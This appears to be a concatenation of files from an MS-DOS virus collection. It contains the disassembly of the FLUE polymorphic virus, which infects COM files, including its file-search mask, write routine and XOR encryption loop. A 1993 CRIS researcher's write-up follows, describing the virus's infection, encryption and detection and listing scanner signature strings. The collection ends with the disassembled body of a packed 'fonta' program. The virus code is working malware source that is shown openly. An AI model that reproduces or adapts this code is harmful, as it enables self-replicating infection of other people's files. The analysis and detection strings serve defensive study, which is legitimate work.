1000:0414 89 86 5604 MOV WORD PTR DS:[BP+Data41], AX
1000:0418 05 0300 ADD AX, 0003h
1000:041b c3 RET
1000:041c Proc6:
1000:041c e8 0b00 CALL Proc4
1000:041f 24 0f AND AL, 0fh
1000:0421 d0 e8 SHR AL, 1
1000:0423 3c 05 CMP AL, 05h
1000:0425 77 f5 JA Proc6
1000:0427 fe c0 INC AL
1000:0429 c3 RET
1000:042a Proc4:
1000:042a b4 2c MOV AH, 2ch
1000:042c cd 21 INT 21h ;Get time
1000:042e 86 ea XCHG CH, DL
1000:0430 90 NOP
1000:0431 b4 2c MOV AH, 2ch
1000:0433 cd 21 INT 21h ;Get time
1000:0435 86 ca XCHG CL, DL
1000:0437 e4 40 IN AL, 40h
1000:0439 86 e0 XCHG AH, AL
1000:043b e4 40 IN AL, 40h
1000:043d 33 c1 XOR AX, CX
1000:043f c3 RET
1000:0440 Data5:
1000:0440 db b9,09,00,58,e2,fd,5d,1f,07,5a,1f,9d,e9,62,ff,00,00,00,eb,10
1000:044f Data16:
1000:0451 Data12:
1000:0452 Data1:
1000:0453 Data20:
1000:0454 db 90,e9,fd,fe
1000:0455 Data29:
1000:0456 Data41:
1000:0458 Data13:
1000:0458 db '*.COM'
1000:045d db 00,2e,2e,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:045e Data14:
1000:0461 Data11:
1000:0471 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:0476 Data19:
1000:0477 Data17:
1000:0479 Data18:
1000:047f Data15:
1000:0485 db 00,00,00,00,00,00,00,20,22,9d,ed,e6,20,e0
1000:0493 e2 ee LOOP Data33
1000:0495 20 f3 AND BL, DH
1000:0497 ad LODSW
1000:0498 87 de XCHG BX, SI
1000:049a 3c 22 CMP AL, 22h
1000:049c 2c 20 SUB AL, 20h
1000:049e f3 REPNZ
1000:049f e0 79 LOOPNZ Data34
1000:04a1 f3 REPNZ
1000:04a2 3a 20 CMP AH, BYTE PTR [BX+SI]
1000:04a4 5b POP BX
1000:04a5 44 INC SP
1000:04a6 e0 52 LOOPNZ Data35
1000:04a8 db 6b,52,e0,59,5d,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ae Data2:
1000:04bc db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04d0 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04e4 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ee Data3:
1000:04f0 Data4:
1000:04f2 db 'Hatsjeee'
1000:04fa 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:04fc 20 28 AND BYTE PTR [BX+SI], CH
1000:04fe 43 INC BX
1000:04ff 29 20 SUB WORD PTR [BX+SI], SP
1000:0501 31 39 XOR WORD PTR [BX+DI], DI
1000:0503 39 32 CMP WORD PTR [BP+SI], SI
1000:0505 2f DAS
1000:0506 31 39 XOR WORD PTR [BX+DI], DI
1000:0508 39 33 CMP WORD PTR [BP+DI], SI
1000:050a 20 62 79 AND BYTE PTR [BP+SI+Data37], AH
1000:050d 20 54 72 AND BYTE PTR [SI+Data38], DL
1000:0510 db 'idenT / [D'
1000:051a 69 64 65 6e54 XOR WORD PTR [SI+Data39], 546eh
1000:051c db 6b,52,e0
1000:051f db 'Y]Oh, BTW it's from '
1000:0533 db 'Holland, and is call'
1000:0547 db 'ed THE FLUEFor those'
1000:055b db ' who are interested'
1000:056e 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:056f 2e
1000:0570 2e
1000:0571 2e
1000:0572 2e
1000:0573 2e
1000:0574 Data22:
1000:0574 58 POP AX
1000:0575 5d POP BP
1000:0576 55 PUSH BP
1000:0577 50 PUSH AX
1000:0578 3e
1000:0579 c6 86 ad05 c3 MOV BYTE PTR DS:[BP+Data8], c3h
1000:057e b4 40 MOV AH, 40h
1000:0580 bb 0000 MOV BX, 0000h
1000:0581 Data21:
1000:0583 b9 9b04 MOV CX, 049bh
1000:0586 8d 96 1301 LEA DX, WORD PTR [BP+Jmp0]
1000:058a cd 21 INT 21h ;Write file
1000:058c 8d be 9e05 LEA DI, WORD PTR [BP+Proc0]
1000:0590 57 PUSH DI
1000:0591 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0595 8b fe MOV DI, SI
1000:0597 8b de MOV BX, SI
1000:0599 c3 RET
1000:059a Proc1:
1000:059a 89 e3 MOV BX, SP
1000:059b Data23:
1000:059c 8b 37 MOV SI, WORD PTR [BX]
1000:059d Data24:
1000:059e Proc0:
1000:059e b9 4002 MOV CX, 0240h
1000:05a1 Data26:
1000:05a1 b8 0000 MOV AX, 0000h
1000:05a2 Data6:
1000:05a4 Jmp4:
1000:05a4 31 04 XOR WORD PTR [SI], AX
1000:05a5 Data27:
1000:05a6 f7 d0 NOT AX
1000:05a7 Data28:
1000:05a8 Data25:
1000:05a8 46 INC SI
1000:05a9 46 INC SI
1000:05aa 49 DEC CX
1000:05ab 75 f7 JNZ Jmp4
1000:05ad Data8:
1000:05ad c3 RET
1000:ffe0 Data36:
2f18:0393 Data32:
2f18:0397 Data30:
2f18:039e Data31:
2f18:0483 Data33:
2f18:04fa Data35:
2f18:051a Data34:
2f18:056e Data40:
2f18:05a2 Data0:
eda4:0000 Data10:
eda4:0065 Data39:
eda4:0072 Data38:
MSDOS/F-Index/Virus.MSDOS.Unknown.flue.txt
+140
View File
@@ -0,0 +1,140 @@
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ This Virus Came To You By Way Of... ³
³ ³
³ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÛÜ ÜÛÜ ÜÛÛÛÛÛÛÛÜ ³
³ ÛÛÛÛß ßÛÛÛ ÛÛÛß ßÛÛÛ ÛÛÛÛÛ ÛÛÛÛß ßÛÛÛÛ ³
³ ÛÛÛÛ ÛÛÛÜ ÜÛÛÛ ÛÛÛÛÛ ßÛÛÛÛÛÜÜ ³
³ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛß ÛÛÛÛÛ ßßÛÛÛÛÛÜ ³
³ ÛÛÛÛÜ ÜÛÛÛ ÜÛÛÜ ÛÛÛÛ ßÛÛÛÛÜ ÜÛÛÜ ÛÛÛÛÛ ÜÛÛÜ ÛÛÛÛÜ ÜÛÛÛÛ ÜÛÛÜ ³
³ ßÛÛÛÛÛÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛß ßÛÛß ßÛÛÛÛÛÛÛß ßÛÛß ³
³ ³
³ ³
³ Computer Research & Information Service ³
³ ³
³ ³
³ Cris is a group of computer users that have a true interest in ³
³ Computer Viruses and Trojans, as well as how they work. ³
³ ³
³ Members of Cris feel a need, not only to be up on the latest ³
³ Bombs, Trojans, Worms, and Viruses, but to safely transfer these ³
³ files into the hands of other dedicated researchers. ³
³ ³
³ Cris cannot be held responsible for the use or misuse of these ³
³ files. Cris releases are sent out to better the knowledge of the ³
³ virus community, for those who would like to learn more about them ³
³ and how they work. ³
³ ³
³ Also, all Cris releases have been pre-tested and informative text ³
³ files are enclosed with valuable information regarding the type of ³
³ virus, how it works, and removal information. If the virus you ³
³ downloaded is not a Cris release, you don't know what you've got. ³
³ ³
³ DuWayne Bonkoski ³
³ (Original Text Written By Michael Paris) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Cris Release Date:12/18/93 ³
³ Type: Virus ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ VSUM Information - Quoted from Patricia M. Hoffman's Hypertext VSUM ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ No Information Found ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Scanning Results ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³
³ McAfee's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ F-Prot's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ TBAV's ViruScan Reports - Detected [Flue] ³ ³
³ Successfully repaired executable ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Researcher's Notes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ The FLUE virus is a polymorphic virus which infects COM files only. The ³
³ FLUE virus has a very visible way to letting you know it has infected ³
³ a file. The virus will "flip" a character screen from right to left or ³
³ vice versa. The screen flip does not work on monochrome monitors, however, ³
³ because the virus is hard-coded to read segment B800 which is where screen ³
³ information lies for color text modes. Monochrome video lies in ³
³ the B000 segment and the virus does not have a routine to sense which ³
³ type of video is being used. ³
³ ³
³ The virus hooks interrupt 24 (Critical Error Handler) which causes the ³
³ virus to replicate if a critical error occurs during execution. ³
³ ³
³ The virus does not become memory resident as far as I can tell. ³
³ ³
³ A character string can be found within the virus body which may appear ³
³ un-encrypted within infected files. The string reads as follows: ³
³ ³
³ Hatsjeee!! <C> 1992/1993 by TridenT / [DàRkRàY]Oh, BTW it's from Holland, ³
³ and is called the FLUEFor those who are interested...... ³
³ ³
³ ³
³ Encryption ³
³ ========== ³
³ The FLUE encrypts itself by XOR'ing the body of the virus with a ³
³ randomly generated word varaiable and then uses the variable's complement ³
³ on the next encryption cycle. ³
³ ³
³ ³
³ Infection ³
³ ========= ³
³ The FLUE infects COM files having a length between 500 and 47987 bytes. ³
³ The virus does not check to see if the file has already been infected and ³
³ will attempt to re-infect an already infected file. ³
³ The decryption routine the virus creates is very polymorphic. The program ³
³ will randomly change which registers it uses to decrypt itself for each ³
³ infected file. ³
³ ³
³ The infected files grow by a varying number of bytes. The virus ³
³ copies a random number of bytes from the zero page and appends them to ³
³ the end of the executable before infecting the file. This is what causes ³
³ the random growth. ³
³ ³
³ Upon execution of an infected file, the virus will try to infect between ³
³ one and eight files plus one more for each directory it moves into. ³
³ ³
³ An interesting note on how the virus appends itself to other COM files. ³
³ At first glance, the source codes does not show any significant file ³
³ write routines that are necessary to cause replication. It took me ³
³ a while to figure out how the virus accomplished this. It does this ³
³ by building it's own write routine as it runs in memory. Just another ³
³ example of the polymorphic capabilities of this virus. ³
³ ³
³ ³
³ Detection ³
³ ========= ³
³ All scanners tested will detect this virus. ³
³ ³
³ This virus can be detected using the following scan strings (for those ³
³ who are using older/other scan utilities): ³
³ ³
³ 89?18B?1B94002?331?1F7?349 - TBAV ³
³ 89??8B??B94002??????31??F7??????49 - F-PROT ³
³ 89?8B?B94002???31?F7???49 - SCAN ³
³ ³
³ ³
³ Summary ³
³ ======= ³
³ I have to admit, the virus was a challenge for me due to it's polymorphic ³
³ capabilities. I had to step through it a couple of times to get a feel ³
³ for what was going on. I'm not sure why all the polymorphism is used ³
³ in this particular strain since the visual cues easily let you know ³
³ something unusual is happening. Otherwise, this virus is a pretty fast ³
³ replicator that wants to be noticed in its own little way. ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
MSDOS/F-Index/Virus.MSDOS.Unknown.fonta.asm
+671
View File
@@ -0,0 +1,671 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ FONTA ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 19-Jan-92 ÛÛ
;ÛÛ Code type: special ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_28e equ 1003h ;*
data_29e equ 1232h ;*
data_30e equ 180Ch ;*
data_33e equ 2005h ;*
data_36e equ 2412h ;*
data_38e equ 3079h ;*
data_47e equ 7830h ;*
data_50e equ 91F0h ;*
data_51e equ 99BDh ;*
data_53e equ 0A901h ;*
data_56e equ 0B3A1h ;*
data_60e equ 0BD01h ;*
data_61e equ 0BF04h ;*
data_70e equ 0F601h ;*
data_71e equ 0F630h ;*
data_72e equ 0F712h ;*
;-------------------------------------------------------------- seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a
mov ax,3463h
mov dx,75Ch
cmp ax,sp
jae loc_2 ; Jump if above or =
mov ax,sp
sub ax,344h
and ax,0FFF0h
mov di,ax
mov cx,0A2h
mov si,17Ch
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov bx,ax
mov cl,4
shr bx,cl ; Shift w/zeros fill
mov cx,ds
add bx,cx
push bx
xor bx,bx ; Zero register
push bx
retf ; Return far
db 0Dh, 01h, 41h
db 'nother Fine aHa/nBa Elite/WareZZ'
db 'ZZZZZZZZZZZZZZZZNot enough memor'
db 'y$'
loc_2:
mov ax,900h
mov dx,15Fh
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; DOS program terminate
nop
std ; Set direction flag
mov di,ax
dec di
dec di
mov si,offset data_22
add si,dx
mov cx,dx
shr cx,1 ; Shift w/zeros fill
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
cld ; Clear direction
xchg si,di
inc si
inc si
mov di,100h
lodsw ; String [si] to ax
xchg ax,bp
mov dx,10h
jmp short loc_12
db 90h
loc_3:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_14
loc_4:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_15
loc_5:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_16
loc_6:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_20
loc_7:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_21
loc_8:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_22
loc_9:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_23
loc_10:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jc loc_13 ; Jump if carry Set
loc_11:
movsb ; Mov [si] to es:[di]
loc_12:
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_10 ; Jump if zero
jnc loc_11 ; Jump if carry=0
loc_13:
xor cx,cx ; Zero register
xor bx,bx ; Zero register
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_3 ; Jump if zero
loc_14:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_4 ; Jump if zero
loc_15:
rcl bx,1 ; Rotate thru carry
test bx,bx
jz loc_18 ; Jump if zero
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_5 ; Jump if zero
loc_16:
rcl bx,1 ; Rotate thru carry
cmp bl,6
jb loc_18 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_17 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_17:
rcl bx,1 ; Rotate thru carry
loc_18:
mov cl,byte ptr cs:[11Ch][bx]
cmp cl,0Ah
je loc_26 ; Jump if equal
loc_19:
xor bx,bx ; Zero register
cmp cx,2
je loc_25 ; Jump if equal
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_6 ; Jump if zero
loc_20:
jc loc_25 ; Jump if carry Set
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_7 ; Jump if zero
loc_21:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_8 ; Jump if zero
loc_22:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_9 ; Jump if zero
loc_23:
rcl bx,1 ; Rotate thru carry
cmp bl,2
jae loc_27 ; Jump if above or =
loc_24:
mov bh,byte ptr cs:[12Ch][bx]
loc_25:
lodsb ; String [si] to al
mov bl,al
push si
mov si,di
sub si,bx
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop si
jmp short loc_12
loc_26:
lodsb ; String [si] to al
add cl,al
adc ch,0
cmp al,0FFh
jne loc_19 ; Jump if not equal
jmp short loc_31
loc_27:
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_28 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_28:
rcl bx,1 ; Rotate thru carry
cmp bl,8
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_29 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_29:
rcl bx,1 ; Rotate thru carry
cmp bl,17h
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_30 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_30:
rcl bx,1 ; Rotate thru carry
and bx,0DFh
xchg bl,bh
jmp short loc_25
loc_31:
xor ax,ax ; Zero register
push es
mov bx,100h
push bx
mov bx,ax
mov cx,ax
mov dx,ax
mov bp,ax
mov si,ax
mov di,ax
retf ; Return far
db 03h, 00h, 02h, 0Ah, 04h, 05h
db 00h, 00h, 00h, 00h, 00h, 00h
db 06h, 07h, 08h, 09h, 01h, 02h
db 00h, 00h, 03h, 04h, 05h, 06h
db 00h
db 7 dup (0)
db 07h, 08h, 09h, 0Ah, 0Bh, 0Ch
db 0Dh, 90h,0A0h, 00h,0EBh, 33h
db 90h, 0Dh, 20h, 01h, 0Dh, 0Ah
db 20h, 41h, 6Eh, 6Fh, 00h, 00h
db 'ther fine aHa/nB'
db 0C0h
db 9, 'a WAREZ'
db 01h, 00h, 1Ah, 03h, 00h, 40h
db 02h, 01h, 01h, 04h, 7Ah, 10h
db 00h, 01h,0B8h, 00h, 05h,0CDh
db 10h,0B4h, 0Fh, 01h, 80h, 04h
db 0BFh, 2Ch, 01h, 8Ah, 25h, 3Ah
db 0C4h, 74h, 06h, 8Ah,0C4h, 32h
db 0E4h, 02h
db 45h
loc_33:
;* pop cs ; Dangerous 8088 only
db 0Fh
mov bp,163h
mov di,data_29e
cmp ax,1B9h
or ah,[bp+di]
xor dx,dx ; Zero register
xor bl,bl ; Zero register
mov ax,1110h
adc al,0C3h
nop
sbb ax,50h
pop es
add [bp-7Fh],di
movsw ; Mov [si] to es:[di]
add word ptr ds:data_51e[bx+di],284Eh
add al,7Eh ; '~'
adc [si-2],bh
db 0FEh,0D6h, 03h,0B8h,0A9h,0BAh
db 0C6h,0FEh, 7Ch, 21h, 6Ch,0EEh
db 0Fh,0C2h, 8Dh, 01h, 7Ch, 38h
db 10h, 10h, 10h, 38h, 7Ch, 3Eh
db 0ABh, 01h, 0Eh, 10h, 0Dh,0D4h
db 9Fh, 24h, 6Ch, 07h, 1Fh,0FEh
db 0A4h, 43h,0FEh, 10h, 01h, 18h
db 3Ch, 9Ch, 26h, 01h, 18h, 0Bh
db 0FFh, 01h,0E7h, 65h, 3Bh,0C3h
db 01h,0E7h, 0Ah,0FFh,0D5h, 7Dh
db 1Fh, 66h, 01h, 21h,0AAh,0BBh
db 1Fh, 99h, 01h, 21h, 80h, 74h
db 12h, 1Eh
db 0Eh, 1Eh, 36h, 78h,0CCh, 01h
db 78h, 9Eh,0B8h
db 42h, 2Dh, 7Eh
db 18h, 18h, 91h, 70h
loc_36:
push dx
push ds
sbb bl,ds:data_30e
js loc_36 ; Jump if sign=1
jo loc_41 ; Jump if overflow=1
push ax
adc byte ptr ds:[236h],bh
db 36h, 76h,0F6h, 66h, 4Eh, 12h
db 37h, 0Ch, 7Dh,0DBh, 7Eh, 33h
db 3Ch, 7Eh, 37h, 00h,0DBh, 30h
db 00h, 80h,0E0h,0F0h,0FCh,0FEh
db 0FCh,0F0h,0E0h
db 37h
data_22 db 80h
db 80h, 10h, 02h, 0Eh, 3Eh, 7Eh
db 0FEh, 7Eh, 3Eh, 0Eh, 02h, 77h
db 0D6h,0ADh, 5Ch, 61h,0EBh,0CCh
db 0B2h, 66h, 01h, 08h, 93h, 24h
db 10h, 7Fh,0DBh, 01h, 7Bh, 1Bh
db 2Fh, 00h, 01h, 30h,0C6h,0C6h
db 60h, 7Ch,0F6h
loc_40:
xchg ax,sp
xchg bl,dh
jl $+0Eh ; Jump if <
or [si+0],bh
push si
loc_41:
sbb word ptr [bp+233h],0FA50h
;* jg loc_46 ;*Jump if >
db 7Fh, 4Fh
jle $+5 ; Jump if < or =
db 60h,0C0h,0FFh, 09h, 0Dh, 70h
db 01h, 0Ch, 0Eh,0FFh, 1Ah, 40h
db 0Eh, 0Ch, 01h,0A3h, 30h, 70h
db 0FEh, 70h, 30h, 83h,0D2h, 02h
db 0B4h,0C0h, 01h,0FEh, 41h,0C3h
db 01h, 0Fh, 24h, 66h,0FFh, 66h
db 24h, 02h, 90h
db 42h
db 2Fh, 83h, 00h, 8Bh, 0Eh, 1Ah
db 0FAh, 7Ch, 38h, 01h,0B1h, 04h
db 01h, 40h,0D5h, 9Dh, 7Ch, 7Dh
db 2Dh, 75h, 90h, 36h, 01h, 14h
db 02h
db 20h, 65h, 7Bh, 6Ch
db 01h,0FEh, 03h, 6Ch, 0Bh,0EAh
db 0B0h,0F2h
loc_46:
db 0C0h, 78h, 3Ch, 06h,0EEh, 05h
db 38h,0C2h, 00h, 62h, 66h, 0Ch
db 18h, 30h, 66h,0C6h, 81h, 80h
db 0Dh, 38h, 6Ch, 38h, 30h, 76h
db 7Eh,0B0h, 76h,0B3h
db 0F4h,0CCh, 01h, 18h, 03h, 70h
db 0DCh,0EEh, 2Bh, 01h, 18h,0E2h
db 0DCh, 7Ah, 09h, 01h, 18h
db 00h,0E2h,0A1h, 0Fh, 42h,0FEh
db 38h, 6Ch, 02h,0A3h
db 0F4h,0AEh,0EFh, 05h,0B7h, 04h
db 58h,0FEh,0BFh, 48h, 09h,0D8h
db 1Fh, 01h, 03h, 06h
db 5Dh, 2Eh
db 08h, 60h,0C0h,0F0h, 7Eh, 92h
db 0Fh, 7Dh,0DBh,0DBh, 05h, 3Ch
db 0F8h, 90h, 78h, 82h,0B0h,0DDh
db 0D0h, 30h,0C6h, 45h,0D5h, 54h
db 10h, 06h, 06h
db 0EEh, 01h, 03h, 28h,0DEh, 0Ch
db 1Ch, 3Ch, 6Ch,0DDh,0E5h, 86h
db 0FEh, 7Fh, 1Eh, 7Bh,0C2h,0C0h
db 0C0h,0FCh, 1Eh,0A8h, 01h, 20h
db 1Eh, 10h,0FAh, 68h, 44h, 0Eh
db 0FEh,0CFh, 9Fh, 4Fh, 01h, 60h
db 0C6h, 7Ch,0BEh,0F5h, 01h, 20h
db 0Ch, 7Eh, 00h
db 40h, 7Dh
db 0F6h,0DCh, 04h, 04h, 10h, 77h
db 0FBh,0F0h,0CDh, 60h, 70h, 36h
db 40h,0FFh, 01h,0CCh,0FDh, 01h
db 1Bh,0C2h,0D3h,0B0h, 60h, 0Ch
db 18h, 00h,0E0h, 15h
data_23 dw 705Eh ; Data table (indexed access)
db 0DEh, 01h,0DCh,0C0h, 7Eh, 31h
db 08h, 22h, 38h, 38h, 6Ch,0FFh
db 0E2h, 67h, 66h,0C0h, 01h, 8Ah
db 0Dh, 20h,0FCh,0B2h, 33h, 32h
db 3Ch, 32h, 33h, 05h,0FCh,0B0h
db 43h, 08h, 60h, 33h, 61h,0F2h
db 08h, 6Fh,0C4h, 6Ch,0DFh,0F8h
db 6Ch, 98h, 3Ch, 36h, 33h, 01h
db 0F3h, 76h, 3Ch, 20h, 29h, 9Dh
db 7Ch,0DAh, 7Eh, 04h, 33h, 40h
db 07h, 83h, 21h,0FFh,0B0h, 32h
db 7Eh, 70h, 00h,0EFh, 00h, 1Ch
db 36h, 63h, 70h, 09h,0C1h,0C0h
db 0CCh,0CCh,0DCh,0BFh, 00h, 50h
db 98h, 0Eh,0E6h, 66h, 6Fh,0FEh
db 04h, 66h, 6Eh,0E0h, 70h, 60h
db 0Eh, 1Bh, 1Fh,0FCh,0D8h, 7Fh
db 4Eh,0C1h, 0Ah,0BEh,0FFh, 1Bh
db 20h, 36h, 13h
db 0CCh, 4Ch, 7Ch, 72h, 03h, 00h
db 0CEh,0C3h,0C3h,0C6h,0CCh,0D8h
db 0F0h,0F8h,0CCh,0C6h,0C0h, 80h
db 83h,0C5h, 3Eh, 6Fh, 37h,0FCh
db 09h,0E0h, 62h,0C0h,0E3h, 63h
db 73h, 7Fh, 5Bh, 43h, 43h,0C3h
db 80h, 92h,0E0h, 07h, 30h, 63h
db 0B0h, 15h, 11h, 67h, 63h, 61h
db 0E0h, 31h, 1Eh, 0Ah,0E3h,0F3h
db 80h,0C3h, 44h, 5Fh, 20h, 02h
db 0C9h,0ACh,0F3h,0B3h, 33h, 3Bh
db 36h, 42h, 3Ch,0F0h, 0Dh,0C0h
db 21h,0E3h,0C1h,0C1h,0D1h,0DBh
db 0DFh,0CEh, 7Eh, 07h, 03h, 80h
db 02h, 1Fh,0E6h
db 'Pf|xnwIg@'
db 11h,0EEh, 3Eh
db 0B0h, 95h, 70h, 1Ch, 06h, 66h
db 3Eh, 6Eh,0FFh, 99h, 0Ch, 7Fh
db 51h, 01h, 5Eh, 03h, 25h, 17h
db 7Bh, 01h,0C7h,0EEh, 58h,0F0h
db 0C0h, 01h, 13h, 1Eh
db 36h, 08h
db 1Bh,0D0h
db 18h, 99h, 01h,0BDh,0E7h,0B3h
db 54h, 42h, 0Eh, 29h, 42h,0FBh
db 50h,0A9h,0CEh, 7Eh, 06h
db 42h, 0Ch, 29h
db 0F9h, 10h, 81h
dw 2412h ; Data table (indexed access)
db 3Ch, 14h, 02h
db 11h, 03h, 0Fh, 3Bh,0E3h,0CAh
db 0C9h,0BEh, 33h, 25h,0F8h,0D1h
db 7Ch, 60h,0FDh,0D0h, 01h, 20h
db 80h, 02h, 2Eh,0FDh, 06h, 03h
db 01h,0BCh, 27h,0D0h, 8Dh, 20h
